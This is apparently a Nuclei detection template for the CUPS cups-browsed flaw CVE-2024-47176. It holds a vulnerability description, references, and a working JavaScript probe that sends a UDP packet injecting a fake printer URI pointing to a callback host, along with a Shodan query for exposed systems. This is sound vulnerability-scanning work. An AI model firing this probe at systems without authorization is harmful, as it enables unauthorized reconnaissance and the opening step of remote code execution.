61 lines
3.0 KiB
YAML
61 lines
3.0 KiB
YAML
id: CVE-2024-47176
|
|
|
|
info:
|
|
name: CUPS - Remote Code Execution
|
|
author: princechaddha
|
|
severity: high
|
|
description: |
|
|
CUPS is a standards-based, open-source printing system, and cups-browsed contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. cups-browsed binds to INADDR_ANY-631, causing it to trust any packet from any source, and can cause the Get-Printer-Attributes IPP request to an attacker controlled URL.
|
|
Due to the service binding to *-631 ( INADDR_ANY ), multiple bugs in cups-browsed can be exploited in sequence to introduce a malicious printer to the system. This chain of exploits ultimately enables an attacker to execute arbitrary commands remotely on the target machine without authentication when a print job is started. This poses a significant security risk over the network. Notably, this vulnerability is particularly concerning as it can be exploited from the public internet, potentially exposing a vast number of systems to remote attacks if their CUPS services are enabled.
|
|
impact: |
|
|
Successful exploitation could allow an attacker to execute arbitrary code on the target system.
|
|
remediation: |
|
|
Apply the necessary patch or upgrade to a non-vulnerable version of CUPS.
|
|
reference:
|
|
- https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
|
|
- https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
|
|
- https://github.com/OpenPrinting/cups-browsed/blob/master/daemon/cups-browsed.c#L13992
|
|
- https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47
|
|
- https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
|
|
cvss-score: 8.3
|
|
cve-id: CVE-2024-47176
|
|
cwe-id: CWE-1327
|
|
epss-score: 0.00045
|
|
epss-percentile: 0.14875
|
|
metadata:
|
|
verified: true
|
|
shodan-query: "product:cups"
|
|
tags: cve,cve2024,cups,udp,printer,oast,rce
|
|
|
|
javascript:
|
|
- pre-condition: |
|
|
isUDPPortOpen(Host,Port);
|
|
code: |
|
|
let packet = bytes.NewBuffer();
|
|
let printer_type = "00";
|
|
let printer_state = "03";
|
|
let printer_uri = `http://${oast}/printers/VulnPrinter`;
|
|
let printer_location = "Office HQ";
|
|
let printer_info = "Vulnerable Printer";
|
|
let message = `${printer_type} ${printer_state} ${printer_uri} "${printer_location}" "${printer_info}"`;
|
|
packet.WriteString(message)
|
|
let c = require("nuclei/net");
|
|
let conn = c.Open('udp', `${Host}:${Port}`);
|
|
conn.SendHex(packet.Hex());
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 631
|
|
oast: "{{interactsh-url}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "natural-language"
|
|
- "VulnPrinter"
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022100b10c65bc03f4254f1fd76b8451d8aae15d76b7695752b2bc70aa19c581eb60d102201c60cf9a656b34b3ceb555b5065a8c2dc22053c30cd4337bbb4d1e2a33293d4b:922c64590222798bb761d5b6d8e72950 |